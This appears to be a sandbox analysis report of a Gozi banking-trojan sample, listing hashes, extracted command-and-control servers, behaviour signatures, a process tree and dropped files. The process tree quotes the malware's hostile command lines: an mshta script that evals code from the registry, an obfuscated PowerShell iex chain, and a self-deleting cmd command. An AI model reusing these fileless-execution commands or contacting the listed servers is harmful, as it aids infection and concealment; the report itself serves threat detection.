Overview

overview

10

Static

static

3

client.exe

windows7-x64

10

client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2023 12:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    client.exe

  • Size

    295KB

  • MD5

    b54e56a2503ac379bcd8e61852d5e861

  • SHA1

    abcfaff56afa6239ac8efaf8e36ef22b6cc9e8d9

  • SHA256

    d5c77653349176a796c3846dfc596292563d0588564eabf542c978b61597278a

  • SHA512

    fa22a6d5369dd5a06647752ea9ec9f335fe57682931b6808bcd4dd84a3eac5d33f0ec525e23f893b820c6b0e76f46c53ae3cf14ecfbf4e468730dcff817a6513

  • SSDEEP

    3072:w6JyBmvmBEayo1tFHtWl0VnkDS7cW6VnYR4UhsyT+dNIY:xJyIv4EayofFNVtMns4y7T+r

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com
Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Users\Admin\AppData\Local\Temp\client.exe
      "C:\Users\Admin\AppData\Local\Temp\client.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3596
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 1392
        3⤵
        • Program crash
        PID:4504
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tkdp='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tkdp).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kkddinybv -value gp; new-alias -name vafomukax -value iex; vafomukax ([System.Text.Encoding]::ASCII.GetString((kkddinybv "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4796
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgfh5x4f\zgfh5x4f.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4932
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FAB.tmp" "c:\Users\Admin\AppData\Local\Temp\zgfh5x4f\CSC431D0170320F4F839199EFEF36271CA.TMP"
            5⤵
              PID:3516
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\by4dkvz3\by4dkvz3.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4876
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8085.tmp" "c:\Users\Admin\AppData\Local\Temp\by4dkvz3\CSC9AB98441A22F4868BCFDA0C9F155EBA5.TMP"
              5⤵
                PID:2840
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4968
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:1420
        • C:\Windows\syswow64\cmd.exe
          "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
          2⤵
            PID:1264
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3780
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:4768
          • C:\Windows\System32\RuntimeBroker.exe
            C:\Windows\System32\RuntimeBroker.exe -Embedding
            1⤵
              PID:4008
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:3108
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3596 -ip 3596
              1⤵
                PID:1652

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\RES7FAB.tmp
                Filesize

                1KB

                MD5

                006f9766ac473fb482c401a929414857

                SHA1

                0357908e5911409b3aabedd0ce9515603148284f

                SHA256

                73030f96a02aeab11dccd58497d1ce4dc80c42542102565ac61450bfb923206a

                SHA512

                7f57d8159354efc81ab96fd92ffe18fcdbe1b60a04d8c9615ab5b9344baf555aa510702834c16f48642980596ceb8000697ce9e231428fac2f48942dc92a249b

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES8085.tmp
                Filesize

                1KB

                MD5

                1b63818ff1232750ef2a91dfe14fab41

                SHA1

                4a29ffbf5e54027948d09e5c140f27c410417955

                SHA256

                38f803cd2180b02f4326450003eaa22261b80c48ee7d84678187660f7b76f51b

                SHA512

                beea09d1ee811de83624cbb96d3630a1cada7a570e3a037894f2a88a2a6d57890445794b3ef5ddc796251e1fced4968cae0f447204d3e631cbe0c8fd253803c9

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcxv3unt.00f.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\by4dkvz3\by4dkvz3.dll
                Filesize

                3KB

                MD5

                20bf82815ca2842993a808db18d2886d

                SHA1

                3ef565e68186b230df5f0994b33d56a442a03bde

                SHA256

                0cf45f0aaa93e9c0a5eaec4aec2545e5cae72feaf7a8ba82c53a91ffb785d80a

                SHA512

                f6adb29428a5ff8b321428610ef3f27434bdf3cb30239a41b3beb94aa142bd5f1e8fe641bacbc0983cf7766fa775f3d4171b81f7de6de210008413c61b8643f7

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\zgfh5x4f\zgfh5x4f.dll
                Filesize

                3KB

                MD5

                fa7f399c7df57259623e25c09aa99390

                SHA1

                3ad072a4eb0675dcd3e7166dbfae56263a50414b

                SHA256

                f233a4478d421614ae85f9a8a5c0c3f7ace4c3174d279746b6387b691928be13

                SHA512

                1746c572271733321447c86a334125bfe2caa8519933a1d9f8c18369d50a6ed1a1ee1b9d5a20d84dd5f6ea04cfb9ca37441d232c21d700e7e856e019d09cd4c1

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\by4dkvz3\CSC9AB98441A22F4868BCFDA0C9F155EBA5.TMP
                Filesize

                652B

                MD5

                34c4c1134d9e4e1a34f532469b364af1

                SHA1

                095001f9c500c6b6478d5f0974c618c8ba881ff9

                SHA256

                e1eb21505ddee08fd89df387f2f857a4323fd17d0252d7cc65d3095e75c61483

                SHA512

                e260640ba2c041c26001444205f7cf0e543e90a5ea153f93ece1c8513f14dac249281130a7634535003db51696edf7d568bd9c69144586ec346f2241a2c4306a

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\by4dkvz3\by4dkvz3.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\by4dkvz3\by4dkvz3.cmdline
                Filesize

                369B

                MD5

                f7dfe5e4c7e452d9911639b880a7e13c

                SHA1

                6940a48bfd24f7e5d8cb26dd9e41c28fc79ef1ed

                SHA256

                9e696693700192339d9bbd02782aa372675606e0f8804ed8c2f6fe144c6dad9f

                SHA512

                de6ccc39780bfb88626c83ec5e24ce36a65e18ebffd77e7865fa4780ce22d9b9bcab9d315b00e088f56473d73d1eab4ab62d41f6a7b707c13ffe69f85a4c00be

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zgfh5x4f\CSC431D0170320F4F839199EFEF36271CA.TMP
                Filesize

                652B

                MD5

                c95447a448c7b4a6f3d0213a0ecca27b

                SHA1

                c7a26ea2ce8eccdb4d6df57305b7644dfa760560

                SHA256

                ce366a1a043a36026351e4b2f85b3beb0bc8515dbc359f3817abebe8656785d6

                SHA512

                770d29e05163eaf31fde2e6902841ce93c85c5b4ec3430a00606de3010e49aa904429338f2f3b9341f579f378ec6105f2350ca97015b497fa7a4a0e6d39f0e2f

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zgfh5x4f\zgfh5x4f.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zgfh5x4f\zgfh5x4f.cmdline
                Filesize

                369B

                MD5

                d97a3b7be33ce1f6e8ff837772bb6b4c

                SHA1

                e9d00387ae20702c9cd26a97d81b61677ed00243

                SHA256

                63d42cd15ae27feb402318c06b58e3bca15f218e7aa6e324dfcac7fc81d5f6a8

                SHA512

                166dc80b3608cb098b8649c01af1a2cb0c9bf012c04d87e3efc63bd3154e63e8cb751603f7c85796f7f74fcba3b5a97e088f0f791beed640b00f28ec48c889f9

                Download Submit
              • memory/1264-105-0x0000000000610000-0x00000000006A8000-memory.dmp
                Filesize

                608KB

                Download
              • memory/1264-109-0x00000000001A0000-0x00000000001A1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1264-118-0x0000000000610000-0x00000000006A8000-memory.dmp
                Filesize

                608KB

                Download
              • memory/1420-112-0x00000246311D0000-0x0000024631274000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1420-116-0x0000024631090000-0x0000024631091000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1420-122-0x00000246311D0000-0x0000024631274000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3084-59-0x0000000000A70000-0x0000000000A71000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3084-100-0x0000000008890000-0x0000000008934000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3084-58-0x0000000008890000-0x0000000008934000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3108-90-0x0000021A3D120000-0x0000021A3D121000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3108-89-0x0000021A3D640000-0x0000021A3D6E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3108-121-0x0000021A3D640000-0x0000021A3D6E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3596-7-0x0000000002500000-0x0000000002600000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/3596-4-0x0000000004030000-0x000000000403D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/3596-3-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/3596-1-0x0000000002500000-0x0000000002600000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/3596-8-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/3596-9-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/3596-119-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/3596-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/3780-106-0x0000022575690000-0x0000022575734000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3780-73-0x0000022575510000-0x0000022575511000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3780-72-0x0000022575690000-0x0000022575734000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4008-113-0x000001FBB30B0000-0x000001FBB3154000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4008-79-0x000001FBB3070000-0x000001FBB3071000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4008-78-0x000001FBB30B0000-0x000001FBB3154000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4768-84-0x000001A23A3A0000-0x000001A23A444000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4768-85-0x000001A2381B0000-0x000001A2381B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4768-120-0x000001A23A3A0000-0x000001A23A444000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4796-24-0x00007FF8BB200000-0x00007FF8BBCC1000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4796-69-0x00007FF8BB200000-0x00007FF8BBCC1000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4796-40-0x000001A2ECA70000-0x000001A2ECA78000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4796-56-0x000001A2ECAA0000-0x000001A2ECADD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4796-70-0x000001A2ECAA0000-0x000001A2ECADD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4796-23-0x000001A2EC800000-0x000001A2EC822000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4796-54-0x000001A2ECA90000-0x000001A2ECA98000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4796-26-0x000001A2D3FD0000-0x000001A2D3FE0000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4796-27-0x000001A2D3FD0000-0x000001A2D3FE0000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4968-102-0x000001AEA7B20000-0x000001AEA7B21000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4968-98-0x000001AEA7BA0000-0x000001AEA7C44000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4968-123-0x000001AEA7BA0000-0x000001AEA7C44000-memory.dmp
                Filesize

                656KB

                Download